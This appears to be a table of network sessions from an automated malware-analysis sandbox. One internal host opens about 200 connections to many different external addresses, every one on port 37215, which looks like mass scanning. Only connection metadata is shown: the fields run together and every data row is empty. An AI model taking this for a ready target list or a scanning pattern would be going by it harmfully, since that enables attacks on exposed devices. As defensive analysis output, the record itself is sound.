                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12928192.168.2.1549234156.78.197.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12929192.168.2.1546866156.62.223.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12930192.168.2.1551474156.162.213.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12931192.168.2.1558926156.28.158.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12932192.168.2.1541850156.149.243.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12933192.168.2.1540426156.117.161.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12934192.168.2.1540738156.96.93.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12935192.168.2.1556440156.171.205.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12936192.168.2.1540452156.30.234.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12937192.168.2.1549742156.113.178.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12938192.168.2.1550522156.78.50.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12939192.168.2.1547970156.202.234.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12940192.168.2.1555752156.23.33.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12941192.168.2.1549540156.58.57.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12942192.168.2.1547038156.4.187.19537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12943192.168.2.1560364156.175.54.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12944192.168.2.1550060156.88.28.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12945192.168.2.1542704156.235.237.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12946192.168.2.1546368156.81.57.21137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12947192.168.2.1545710156.255.58.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12948192.168.2.1538280156.187.9.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12949192.168.2.1544882156.55.7.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12950192.168.2.1543744156.56.76.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12951192.168.2.1555104156.70.86.15137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12952192.168.2.1551526156.106.228.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12953192.168.2.1552490156.242.92.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12954192.168.2.1548888156.94.229.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12955192.168.2.1534120156.92.58.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12956192.168.2.1535936156.111.211.11237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12957192.168.2.1541730156.210.83.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12958192.168.2.1550160156.3.76.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12959192.168.2.1541708156.22.23.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12960192.168.2.1551934156.203.202.5537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12961192.168.2.1536456156.195.252.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12962192.168.2.1544424156.65.29.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12963192.168.2.1544760156.203.80.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12964192.168.2.1556230156.105.103.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12965192.168.2.1543694156.221.154.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12966192.168.2.1543286156.123.51.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12967192.168.2.1537642156.26.2.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12968192.168.2.1551576156.88.10.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12969192.168.2.1533234156.206.15.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12970192.168.2.1547662156.191.122.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12971192.168.2.1543042156.81.107.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12972192.168.2.1537838156.79.179.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12973192.168.2.1544960156.27.14.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12974192.168.2.1554672156.119.56.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12975192.168.2.1551712156.162.214.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12976192.168.2.1543762156.96.44.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12977192.168.2.1538778156.154.96.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12978192.168.2.1532894156.203.161.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12979192.168.2.1555998156.0.100.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12980192.168.2.1554704156.82.85.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12981192.168.2.1537108156.197.88.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12982192.168.2.1557082156.230.20.17237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12983192.168.2.1544318156.120.153.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12984192.168.2.1547494156.121.149.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12985192.168.2.1540944156.213.96.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12986192.168.2.1538404156.135.24.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12987192.168.2.1558560156.64.41.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12988192.168.2.1537706156.223.192.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12989192.168.2.1548840156.181.29.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12990192.168.2.1556890156.154.158.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12991192.168.2.1537894156.226.196.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12992192.168.2.1553732156.199.46.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12993192.168.2.1545582156.133.82.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12994192.168.2.1557290156.215.57.25437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12995192.168.2.1557310156.52.149.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12996192.168.2.1542264156.132.170.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12997192.168.2.1559296156.218.143.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12998192.168.2.155853241.93.252.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            12999192.168.2.155260041.60.95.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13000192.168.2.154742241.98.32.4937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13001192.168.2.154446041.33.87.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13002192.168.2.155925041.194.230.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13003192.168.2.153781441.31.118.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13004192.168.2.155842241.139.85.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13005192.168.2.154032241.123.11.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13006192.168.2.155770841.60.56.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13007192.168.2.155877641.169.225.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13008192.168.2.155500241.208.84.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13009192.168.2.155811641.152.92.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13010192.168.2.154821241.136.19.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13011192.168.2.153605241.125.43.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13012192.168.2.153492841.225.145.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13013192.168.2.154034441.229.170.637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13014192.168.2.153753641.16.210.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13015192.168.2.154971641.191.106.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13016192.168.2.154982641.253.14.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13017192.168.2.153308841.220.215.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13018192.168.2.155351241.126.81.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13019192.168.2.153689441.77.156.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13020192.168.2.155142241.55.51.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13021192.168.2.155278841.212.208.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13022192.168.2.155005441.230.236.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13023192.168.2.155416841.215.125.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13024192.168.2.154079241.120.255.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13025192.168.2.154552041.139.173.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13026192.168.2.155727841.160.123.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13027192.168.2.153958841.73.145.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13028192.168.2.155890041.227.133.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13029192.168.2.154178041.219.33.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13030192.168.2.153378041.6.0.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13031192.168.2.154715641.23.202.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13032192.168.2.153343041.50.38.8037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13033192.168.2.154261841.144.130.18137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13034192.168.2.154811441.153.96.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13035192.168.2.154999241.10.154.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13036192.168.2.155625041.146.158.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13037192.168.2.156052041.68.118.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13038192.168.2.153354841.30.202.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13039192.168.2.155006241.18.184.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13040192.168.2.153386241.81.246.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13041192.168.2.155102241.31.57.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13042192.168.2.155598641.36.98.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13043192.168.2.153450241.192.85.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13044192.168.2.154017841.187.93.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13045192.168.2.155434841.215.190.22737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13046192.168.2.154065241.245.153.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13047192.168.2.154479241.12.59.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13048192.168.2.153758241.145.248.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13049192.168.2.155307641.36.108.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13050192.168.2.153423041.194.238.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13051192.168.2.155952441.79.170.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13052192.168.2.155102041.80.234.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13053192.168.2.155136841.59.130.23537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13054192.168.2.154104041.219.244.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13055192.168.2.154187441.226.231.18637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13056192.168.2.156029241.153.100.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13057192.168.2.154895441.242.245.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13058192.168.2.154165841.100.223.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13059192.168.2.154769841.96.82.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13060192.168.2.155280841.169.118.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13061192.168.2.155037641.9.123.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13062192.168.2.156001441.202.108.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13063192.168.2.155313641.62.30.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13064192.168.2.154689441.127.46.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13065192.168.2.154748641.147.78.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13066192.168.2.154820241.99.27.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13067192.168.2.153311841.252.103.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13068192.168.2.153696041.158.153.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13069192.168.2.154729641.59.33.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13070192.168.2.155538641.77.204.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13071192.168.2.153391241.202.50.2937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13072192.168.2.154470441.43.78.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13073192.168.2.153550441.203.153.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13074192.168.2.154194441.228.82.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13075192.168.2.153523041.253.148.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13076192.168.2.154423041.82.106.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13077192.168.2.153419841.126.190.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13078192.168.2.154235441.100.162.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13079192.168.2.153543041.100.100.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13080192.168.2.155751041.0.201.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13081192.168.2.155560641.0.245.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13082192.168.2.153615841.41.69.9737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13083192.168.2.155973441.153.232.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13084192.168.2.153313441.41.168.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13085192.168.2.155077241.138.107.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13086192.168.2.153584441.143.24.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13087192.168.2.154073041.239.8.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13088192.168.2.153800041.211.236.15737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13089192.168.2.155226441.138.141.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13090192.168.2.155493441.39.197.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13091192.168.2.155854441.94.95.21737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13092192.168.2.154281041.179.47.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13093192.168.2.154697041.210.217.8437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13094192.168.2.153348641.254.184.25137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13095192.168.2.153440041.55.108.20137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13096192.168.2.154960641.207.246.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13097192.168.2.155539841.6.173.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13098192.168.2.155160641.130.69.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13099192.168.2.153920441.199.36.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13100192.168.2.154020641.79.223.22137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13101192.168.2.154378841.166.134.19437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13102192.168.2.155868641.55.166.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13103192.168.2.154290441.47.148.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13104192.168.2.154215041.16.75.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13105192.168.2.153532841.70.224.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13106192.168.2.155849641.238.4.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13107192.168.2.155506441.142.65.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13108192.168.2.153850641.62.231.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13109192.168.2.153305841.120.127.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13110192.168.2.155402441.149.101.13737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13111192.168.2.153906841.208.172.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13112192.168.2.155849241.97.62.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13113192.168.2.154492441.122.52.22437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13114192.168.2.155944441.212.238.23037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13115192.168.2.155431041.177.78.6037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13116192.168.2.154061641.160.62.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13117192.168.2.156020441.131.92.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13118192.168.2.153327641.167.79.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13119192.168.2.153728241.244.54.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13120192.168.2.154792841.121.19.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13121192.168.2.155553041.24.32.2837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13122192.168.2.155866641.198.94.10337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13123192.168.2.154946041.154.103.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13124192.168.2.153459841.34.133.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13125192.168.2.154610841.224.113.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13126192.168.2.155880841.0.3.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13127192.168.2.155952441.234.170.13937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13128192.168.2.154794841.122.99.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            13129192.168.2.153626841.223.252.9337215
